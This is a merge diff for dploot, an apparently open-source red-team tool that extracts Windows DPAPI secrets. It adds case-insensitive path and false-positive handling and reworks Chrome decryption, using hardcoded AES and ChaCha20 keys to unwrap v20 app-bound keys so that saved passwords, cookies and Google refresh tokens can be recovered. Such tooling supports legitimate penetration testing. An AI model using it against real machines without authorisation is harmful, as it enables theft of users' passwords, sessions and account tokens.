Merge branch 'zblurx:main' into Fix-my

Author: DidierA

dploot/lib/consts.py

@@ -9,3 +9,22 @@
     "Default User",
     "All Users",
 ]
+
+# simple class to check for false positives, case insensitive
+class FalsePositives(list):
+    def __init__(self,
+                 false_positives: list[str] = None
+    ) -> None:
+        if false_positives is None:
+            false_positives = FALSE_POSITIVES
+
+        super().__init__(map (lambda x: x.lower(), false_positives))
+
+    def __contains__(self, name):
+        return super().__contains__(str(name).lower())
+
+    def __setitem__(self, key, value):
+        return super().__setitem__(key,str(value).lower())
+
+    def append(self, element):
+        return super().append(str(element).lower())

dploot/lib/crypto.py

@@ -280,12 +280,7 @@ def decrypt_chrome_password(encrypted_password: str, aeskey: bytes):
     iv, payload = rest[:12], rest[12:]
     cipher = AES.new(aeskey, AES.MODE_GCM, iv)
     decrypted = cipher.decrypt(payload)
-    if version in (b"v10",b"v11"):
-        decrypted = decrypted[:-16]
-    elif version in (b"v20"):
-        decrypted = decrypted[32:]
-        decrypted = decrypted[:-16]
-    decrypted = decrypted.decode("utf-8")
+    decrypted = decrypted[:-16]
     return decrypted or None
 
 def deriveKeysFromUser(sid, password):

dploot/lib/masterkey.py

@@ -11,10 +11,10 @@
 
 
 class Masterkey:
-    def __init__(self, guid, blob = None, sid = None, key = None, sha1 = None, user: str = "None") -> None:
+    def __init__(self, guid, blob = None, sid:str = None, key = None, sha1 = None, user: str = "None") -> None:
         self.guid = guid
         self.blob = blob
-        self.sid = sid
+        self.sid = str(sid).upper()
         self.user = user
 
         self.key = key

dploot/lib/smb.py

@@ -2,9 +2,12 @@
 import os
 import logging
 import time
+
+from pathlib import Path
 from typing import Any, Dict, List, Optional
 
 from dploot.lib.target import Target
+from dploot.lib.consts import FalsePositives
 
 from impacket.smbconnection import SMBConnection
 from impacket.winregistry import Registry
@@ -22,8 +25,6 @@
 )
 
 from dploot.lib.wmi import DPLootWmiExec
-from dploot.lib.consts import FALSE_POSITIVES
-
 
 class DPLootSMBConnection:    
     # if called with target = LOCAL, return an instance of DPLootLocalSMConnection,
@@ -43,14 +44,14 @@ def __new__(
             # we end up here when a child class is instantiated.
             return super().__new__(cls)
 
-    def __init__(self, target: Target, false_positive: List[str] = FALSE_POSITIVES) -> None:
+    def __init__(self, target: Target, false_positive: List[str] | None = None) -> None:
         self.target = target
         self.remote_ops = None
         self.local_session = None
 
         self._usersProfiles = None
 
-        self.false_positive = false_positive
+        self.false_positive = FalsePositives(false_positive)
 
     def listDirs(self, share: str, dirlist: List[str]) -> Dict[str, Any]:
         result = {}
@@ -390,8 +391,8 @@ def _sharedfile_fromdirentry(d: os.DirEntry):
 
     SharedFile.fromDirEntry = _sharedfile_fromdirentry
 
-    def remote_list_dir(self, share, path, wildcard=True) -> "Any | None":
-        path = os.path.join(self.target.local_root, path.replace("\\", os.sep))
+    def remote_list_dir(self, share, path, wildcard=True) -> list[SharedFile]:
+        path = self.get_real_path(path)
         if not wildcard:
             raise NotImplementedError("Not implemented for wildcard == False")
         try:
@@ -418,6 +419,36 @@ def listPath(self, shareName: str = "C$", path: Optional[str] = None, password:
     def getFile(self, *args, **kwargs) -> "Any | None":
         raise NotImplementedError("getFile is not implemented in LOCAL mode")
 
+    def get_real_path(self, path:str) -> str:
+        """Match path against file system (case insensitive if py>=3.12).
+            Only used when target is `LOCAL`.
+
+        Args:
+            path (str): pah representation (ie C:\\Windows\\...)
+
+        Returns:
+            str: real path on the filesystem
+        """
+        # clean path (remove c:\, /, and current root if already present)
+        path=path.removeprefix(self.target.local_root)
+        if path[:3].lower() == "c:\\":
+            path = path[3:]
+        path=path.replace("\\", os.sep).lstrip(os.sep)
+
+        globok = False
+        # The pattern to match does not contain jokers, so Path.glob() should return 0 or 1 match
+        try:
+            path=next(Path(self.target.local_root).glob(path, case_sensitive=False))
+            globok=True
+        except (StopIteration, TypeError):
+            # StopIteration: path does not exist.
+            # TypeError: unexpexted keyword (case_sensitive added in python 3.12)
+            # Return a representation of path anyway
+            path=os.path.join(self.target.local_root, path)
+
+        #logging.debug(f"get_real_path: [{globok=}] returning {path}")
+        return str(path)
+
     def readFile(
         self,
         shareName,
@@ -431,12 +462,10 @@ def readFile(
     ) -> bytes:
         data = None
         try:
-            with open(
-                os.path.join(self.target.local_root, path.replace("\\", os.sep)), "rb"
-            ) as f:
+            with open(self.get_real_path(path), "rb") as f:
                 data = f.read()
         except Exception as e:
-            logging.debug(f"Exception occurred while trying to read {path}: {e}")
+            logging.debug(f"Exception occurred while trying to read {path}: {repr(e)}")
 
         return data
 
@@ -453,7 +482,7 @@ def getUsersProfiles(self) -> dict[str, str] | None:
 
         result = {}
         # open hive
-        reg_file_path = os.path.join(self.target.local_root, self.hklm_software_path)
+        reg_file_path = self.get_real_path(self.hklm_software_path)
         reg = Registry(reg_file_path, isRemote=False)
 
         # open key
@@ -474,6 +503,7 @@ def getUsersProfiles(self) -> dict[str, str] | None:
                 .replace(r"%systemroot%", self.systemroot)
             )
             path = ntpath.normpath(path)
+            path = self.get_real_path(path)
             # store in result dict
             result[user_sid] = path
 

dploot/lib/target.py

@@ -86,6 +86,8 @@ def create(
         if (
             not password
             and username != ""
+            and lmhash == ""
+            and nthash == ""
             and hashes is None
             and aesKey is None
             and no_pass is not True

dploot/lib/utils.py

@@ -34,7 +34,7 @@ def is_certificate_guid(value: str):
 
 
 def is_credfile(value: str):
-    guid = re.compile(r"[A-F0-9]{32}")
+    guid = re.compile(r"[A-F0-9a-f]{32}")
     return guid.match(value)
 
 

dploot/triage/__init__.py

@@ -4,28 +4,27 @@
 from dploot.lib.target import Target
 from dploot.lib.smb import DPLootSMBConnection
 from dploot.lib.masterkey import Masterkey
-from dploot.lib.consts import FALSE_POSITIVES
+from dploot.lib.consts import FalsePositives
 
 # Define base triage class.
 
-class Triage(ABC):
+class Triage:
     """
-    Abstract Class Definition for the DPLoot Triage Class.
+    Class Definition for the DPLoot Triage Class.
     """
-    @abstractmethod
     def __init__(
         self,
         target: Target,
         conn: DPLootSMBConnection,
         masterkeys: List[Masterkey] = None,
         per_loot_callback: Callable = None,
-        false_positive: List[str] = FALSE_POSITIVES,
+        false_positive: List[str] | None = None,
     ) -> None:
 
         self.target = target
         self.conn = conn
         self.masterkeys = masterkeys
         self.per_loot_callback = per_loot_callback
-        self.false_positive = false_positive
-        
+        self.false_positive = FalsePositives(false_positive)
+
         self.looted_files = {}

dploot/triage/browser.py

@@ -1,5 +1,5 @@
 import base64
-from Cryptodome.Cipher import AES
+from Cryptodome.Cipher import AES, ChaCha20_Poly1305
 from binascii import hexlify
 import json
 import logging
@@ -9,7 +9,6 @@
 from impacket.structure import Structure
 
 
-from dploot.lib.consts import FALSE_POSITIVES
 from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
 from dploot.lib.smb import DPLootSMBConnection
 from dploot.lib.target import Target
@@ -47,12 +46,20 @@ def key(self):
             return self._key
         if len(self["Key"]) == 32:
             self._key = self["Key"]
-        else: # from https://gist.github.com/thewh1teagle/d0bbc6bc678812e39cba74e1d407e5c7
-            key = base64.b64decode("sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=")
+        else: # from https://github.com/runassu/chrome_v20_decryption/blob/main/decrypt_chrome_v20_cookie.py
+            aes_key = bytes.fromhex("B31C6E241AC846728DA9C1FAC4936651CFFB944D143AB816276BCC6DA0284787")
+            chacha20_key = bytes.fromhex("E98F37D7F4E1FA433D19304DC2258042090E2D1D7EEA7670D41F738D08729660")
+            flag = self["Key"][0]
             iv = self["Key"][1:13]
             encrypted_text = self["Key"][13:45]
-            cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
-            self._key = cipher.decrypt(ciphertext=encrypted_text)
+            if flag == 1:
+                cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
+                self._key = cipher.decrypt(ciphertext=encrypted_text)
+            elif flag == 2:
+                cipher = ChaCha20_Poly1305.new(key=chacha20_key, nonce=iv)
+                self._key = cipher.decrypt(ciphertext=encrypted_text)
+            else:
+                raise ValueError(f"Unsupported flag: {flag}")
         return self._key
 
 @dataclass
@@ -165,7 +172,7 @@ def __init__(
         conn: DPLootSMBConnection,
         masterkeys: List[Masterkey],
         per_secret_callback: Callable = None,
-        false_positive: List[str] = FALSE_POSITIVES,
+        false_positive: List[str] | None = None,
     ) -> None:
         super().__init__(
             target, 
@@ -235,35 +242,40 @@ def triage_chrome_browsers_for_user(
                     f"Found {browser.upper()} AppData files for user {user}"
                 )
                 aesStateKey_json = json.loads(aesStateKey_bytes)
-                profiles = aesStateKey_json['profile']['profiles_order']
-                blob = base64.b64decode(aesStateKey_json["os_crypt"]["encrypted_key"])
-                if blob[:5] == b"DPAPI":
-                    dpapi_blob = blob[5:]
-                    masterkey = find_masterkey_for_blob(
-                        dpapi_blob, masterkeys=self.masterkeys
-                    )
-                    if masterkey is not None:
-                        aeskey = decrypt_blob(
-                            blob_bytes=dpapi_blob, masterkey=masterkey
-                        )
-                
-                if "app_bound_encrypted_key" in aesStateKey_json["os_crypt"]:
-                    app_bound_blob = base64.b64decode(aesStateKey_json["os_crypt"]["app_bound_encrypted_key"])
-                    dpapi_blob = app_bound_blob[4:] # Trim off APPB
-                    masterkey = find_masterkey_for_blob(
+                try:
+                    blob = base64.b64decode(aesStateKey_json["os_crypt"]["encrypted_key"])
+                    if blob[:5] == b"DPAPI":
+                        dpapi_blob = blob[5:]
+                        masterkey = find_masterkey_for_blob(
                             dpapi_blob, masterkeys=self.masterkeys
                         )
-                    if masterkey is not None:
-                        intermediate_key = decrypt_blob(
-                            blob_bytes=dpapi_blob, masterkey=masterkey
-                        )
+                        if masterkey is not None:
+                            aeskey = decrypt_blob(
+                                blob_bytes=dpapi_blob, masterkey=masterkey
+                            )
+
+                    if "app_bound_encrypted_key" in aesStateKey_json["os_crypt"]:
+                        app_bound_blob = base64.b64decode(aesStateKey_json["os_crypt"]["app_bound_encrypted_key"])
+                        dpapi_blob = app_bound_blob[4:] # Trim off APPB
                         masterkey = find_masterkey_for_blob(
-                            intermediate_key, masterkeys=self.masterkeys
-                        )
-                        if masterkey:
-                            app_bound_key = AppBoundKey(decrypt_blob(
-                                blob_bytes=intermediate_key, masterkey=masterkey
-                            )).key
+                                dpapi_blob, masterkeys=self.masterkeys
+                            )
+                        if masterkey is not None:
+                            intermediate_key = decrypt_blob(
+                                blob_bytes=dpapi_blob, masterkey=masterkey
+                            )
+                            masterkey = find_masterkey_for_blob(
+                                intermediate_key, masterkeys=self.masterkeys
+                            )
+                            if masterkey:
+                                app_bound_key = AppBoundKey(decrypt_blob(
+                                    blob_bytes=intermediate_key, masterkey=masterkey
+                                )).key
+                    profiles = aesStateKey_json['profile']['profiles_order']
+                except KeyError as e:
+                    logging.debug(f"Key not found! {repr(e)}")
+                    # logging.debug(f"{aesStateKey_json=}")
+
             for profile in profiles:
                 loginData_bytes = self.conn.readFile(
                     shareName=self.share,
@@ -289,14 +301,14 @@ def triage_chrome_browsers_for_user(
                         for url, username, encrypted_password in lines:
                             password = None
                             try:
-                                if encrypted_password[:3] == "v20":
+                                if encrypted_password[:3] == b"v20":
                                     password = decrypt_chrome_password(
                                     encrypted_password, app_bound_key
-                                    )
+                                    ).decode("utf-8")
                                 else:
                                     password = decrypt_chrome_password(
                                     encrypted_password, aeskey
-                                    )
+                                    ).decode("utf-8")
                             except Exception as e:
                                 logging.debug(f"Could not decrypt chrome cookie: {e}")
                             login_data_decrypted = LoginData(
@@ -347,11 +359,11 @@ def triage_chrome_browsers_for_user(
                                         if encrypted_cookie[:3] == b"v20":
                                             decrypted_cookie_value = decrypt_chrome_password(
                                             encrypted_cookie, app_bound_key
-                                            )
+                                            )[32:].decode("utf-8")
                                         else:
                                             decrypted_cookie_value = decrypt_chrome_password(
                                             encrypted_cookie, aeskey
-                                            )
+                                            ).decode("utf-8")
                                     except Exception as e:
                                         logging.debug(f"Could not decrypt chrome cookie: {e}")
                                     cookie = Cookie(
@@ -391,7 +403,7 @@ def triage_chrome_browsers_for_user(
                     lines = query.fetchall()
                     if len(lines) > 0:
                         for service, encrypted_grt in lines:
-                            token = decrypt_chrome_password(encrypted_grt, aeskey)
+                            token = decrypt_chrome_password(encrypted_grt, aeskey).decode("utf-8")
                             google_refresh_token = GoogleRefreshToken(
                                 winuser=user, browser=browser, service=service, token=token
                             )